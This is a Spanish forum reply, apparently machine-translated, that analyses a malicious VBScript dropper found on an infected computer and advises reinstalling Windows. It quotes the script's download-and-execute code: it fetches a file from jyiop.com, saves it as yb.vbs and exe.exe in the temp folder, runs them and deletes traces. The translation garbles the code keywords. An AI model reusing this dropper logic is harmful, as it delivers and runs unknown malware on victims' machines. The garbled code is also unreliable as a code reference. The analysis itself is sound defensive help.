No estoy dispuesto a ir hasta la apertura de los Web site que usted mencionó sin embargo, de las escrituras arriba aquí soy lo que veo…
La escritura 1 está creando un archivo en blanco, acoplamientos a un Web site y a las transferencias directas el contenido de la página y descargas él en el archivo en blanco. Este archivo se salva como “yb.vbs” y se supone ejecutar.
-------------------------------------------------------------------
B= " yb.vbs "
Con CreateObject (“MSXML2.XMLHTTP
”)
.open “CONSIGUEN”, “
http://jyiop.com/kr/yb.vbs”, falso
.send ()
Fijar A = CreateObject (“Scripting.FileSystemObject
”)
Fijar D = A.CreateTextFile (A.GetSpecialFolder
(
2) + “\” + B)
D.WriteLine .responseText
Extremo con
D.Close
CreateObject (“WScript.Shell
”). Funcionar A.GetSpecialFolder (2) +” \ “+ B
-------------------------------------------------------------------
El paso 2 ahora que se ha creado el archivo de los vbs y funcionamiento, intenta visitar otro Web page pero este vez ahorra el contenido del Web page en un archivo llamado “exe.exe”. Este nuevo archivo debe ser ahorrado en la carpeta del temp de los usuarios.
La escritura entonces funciona el archivo “exe.exe”.
¡Como usted mencionó, el taskkill para Windows Media Player - porqué, que sabe?!?!
La escritura entonces suprime la escritura del vb que el paso 1 creó (la escritura que está funcionando actual).
Hay una segundo espera 3 entonces que el archivo “exe.exe” se suprime.
Esta parte;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Si c.Status = x después
u=c.ResponseBody: d.Open: d.Type
= y: d.Write u: d.SaveToFile b: d.Close]
es la escritura que mecanografía para abrir un archivo que fluya en el Web page - nada hacer con Adobe. “c.Status” - la escritura está esperando el Web page para ser lista y cabida para transferir. “u=c.ResponseBody” toma el Web page y lo empuja en una variable. Se abre la corriente y el texto se transfiere en la variable. Se salva y se cierra el archivo. En esta escritura el Web page/el archivo se salva en la carpeta del temp como “exe.exe”.
El peligro verdadero es que archivo de “exe.exe”. Una vez que se ha funcionado, no se sabe qué fue diseñada para hacer.
Esa computadora todavía se infecta con un virus. El programa “exe.exe” habría podido transferir otros virus en el fondo para impedir las exploraciones del sistema. El hecho de que usted pueda ver la ventana del comando abierta y la escritura se intenta para funcionar me dice que hay alguÌn archivo malévolo todavía que se retrasa.
Puede ser hora de evaluar qué necesidades de ser ahorrado de esa máquina y comenzar de nuevo con una reinstalación de Windows y de los usos. Suena dramático pero viendo como el antivirus no está detectando cualquier cosa fuera de clases yo pensar que usted está actualmente ninguna vuelta. Recordar eso mientras el código malévolo esté prendido allí, cualquiera conducen; sea el palillo de la memoria del USB, la cámara etc., puede potencialmente contener al virus/al Trojan, si fue atado a la máquina.
